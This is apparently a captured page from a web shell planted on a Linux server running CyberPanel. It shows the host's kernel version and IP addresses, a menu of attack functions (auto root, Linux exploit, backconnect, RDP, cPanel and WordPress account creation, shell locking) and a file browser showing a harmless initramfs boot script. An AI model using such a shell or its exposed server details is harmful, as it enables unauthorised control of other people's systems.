Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
scripts /
init-top /
[ HOME SHELL ]
Name
Size
Permission
Action
00_mount_efivarfs
316
B
-rwxr-xr-x
all_generic_ide
384
B
-rwxr-xr-x
blacklist
519
B
-rwxr-xr-x
console_setup
3.34
KB
-rwxr-xr-x
framebuffer
3.16
KB
-rwxr-xr-x
udev
568
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : all_generic_ide
#!/bin/sh PREREQ="" prereqs() { echo "$PREREQ" } case $1 in # get pre-requisites prereqs) prereqs exit 0 ;; esac # shellcheck disable=SC2013 for x in $(cat /proc/cmdline); do case ${x} in all_generic_ide) modprobe ata_generic all_generic_ide=1 ;; all_generic_ide=*) if [ -n "${x#all_generic_ide=}" ]; then modprobe ata_generic all_generic_ide=1 fi ;; esac done
Close